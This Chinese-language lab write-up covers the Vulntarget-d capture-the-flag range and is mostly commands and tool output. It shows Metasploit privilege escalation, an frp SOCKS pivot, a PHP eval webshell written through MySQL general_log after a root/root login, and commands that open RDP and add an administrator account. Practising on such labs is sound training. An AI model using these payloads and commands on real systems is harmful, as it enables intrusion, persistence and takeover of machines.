Vulntarget-d

flag01

fscan一阵乱扫

发现了骑士cms

跟着网上得文章复现

https://www.cnblogs.com/twlr/p/14142870.html

然后getshell，传到msf上来，这次用viper玩玩

进行提权脚本搜索

1	run post/multi/recon/local_exploit_suggester

#   Name                                                               Potentially Vulnerable?  Check Result
-   ----                                                               -----------------------  ------------
1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
2   exploit/linux/local/network_manager_vpnc_username_priv_esc         Yes                      The service is running, but could not be validated.
3   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
4   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.
5   exploit/linux/local/sudoedit_bypass_priv_esc                       Yes                      The target appears to be vulnerable. Sudo 1.8.21p2.pre.3ubuntu1.4 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module

1	use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

成功提权root

1	flag{welcome_to_vulntarget-d}

flag02

发现这里是双网卡

上传一个fscan进行扫描

start infoscan
(icmp) Target 10.0.20.131     is alive
(icmp) Target 10.0.20.1       is alive
(icmp) Target 10.0.20.2       is alive
[*] Icmp alive hosts len is: 3
10.0.20.131:80 open
10.0.20.2:139 open
10.0.20.2:135 open
10.0.20.2:3306 open
10.0.20.2:80 open
10.0.20.131:888 open
10.0.20.1:445 open
10.0.20.1:139 open
10.0.20.131:3306 open
10.0.20.131:81 open
10.0.20.2:445 open
10.0.20.1:135 open
10.0.20.1:7680 open
10.0.20.1:7890 open
10.0.20.131:8888 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo:
[*]10.0.20.1
   [->]JK\7r192.168.0.1
   [->]10.0.10.1
   [->]192.168.33.1
   [->]192.168.56.1
   [->]10.0.20.1
   [->]172.20.10.2
   [->]240e:431:1220:9a34:a8ba:31f1:e54e:87a9
   [->]240e:431:1220:9a34:b496:ba67:f381:c674
[*] WebTitle: http://10.0.20.1:7890     code:400 len:0      title:None
[*] WebTitle: http://10.0.20.131        code:200 len:1326   title:没有找到站点
[*] WebTitle: http://10.0.20.131:888    code:404 len:548    title:404 Not Found
[*] NetInfo:
[*]10.0.20.2
   [->]WIN-D4S86JO2R26
   [->]10.0.20.2
[*] 10.0.20.2  (Windows 7 Ultimate 7601 Service Pack 1)
[*] WebTitle: http://10.0.20.131:8888   code:302 len:219    title:Redirecting... 跳转url: http://10.0.20.131:8888/login
[*] WebTitle: http://10.0.20.131:8888/login code:200 len:802    title:安全入口校验失败
[*] WebTitle: http://10.0.20.2          code:200 len:11     title:None
[*] WebTitle: http://10.0.20.131:81     code:200 len:127212 title:骑士PHP高端人才系统(www.74cms.com)

发现10.0.20.2:3306

上传一个frp进行socks代理

看了端口这些，不知道干什么了于是就上dirsearch进行后台扫描

1	dirsearch -u http://10.0.20.2/ --proxy socks5://172.20.10.4:8989

发现在存在phpmyadmin

root/root弱密码进入后台

发现是root权限，那这就好办了啊

1
2
3

show global variables like '%secure%';
set global general_log = on;
set global general_log_file = 'C:/phpStudy/PHPTutorial/WWW/she11.php';

1	select "<?php echo '1';@eval($_POST[cmd])?>"

发现是一个很低的权限

这里用的掩日的免杀，进行反弹上viper

exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/cve_2019_1458_wizardopium                Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
 6   exploit/windows/local/cve_2020_1054_drawiconex_lpe             Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/cve_2021_40449                           Yes                      The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
 8   exploit/windows/local/cve_2021_40449_api                       Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.
 10  exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 11  exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 12  exploit/windows/local/ms15_078_atmfd_bof                       Yes                      The service is running, but could not be validated.
 13  exploit/windows/local/ms16_014_wmi_recv_notif                  Yes                      The target appears to be vulnerable.
 14  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 15  exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.
 16  exploit/windows/local/ms16_075_reflection_juicy                Yes                      The target appears to be vulnerable.
 17  exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.

额，这里直接getsystem就行了

#最全
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

新增一个administrator用户进行rdp

1	flag{happy_new_year_vulntarget-d}

Viper就是好用，释放双手！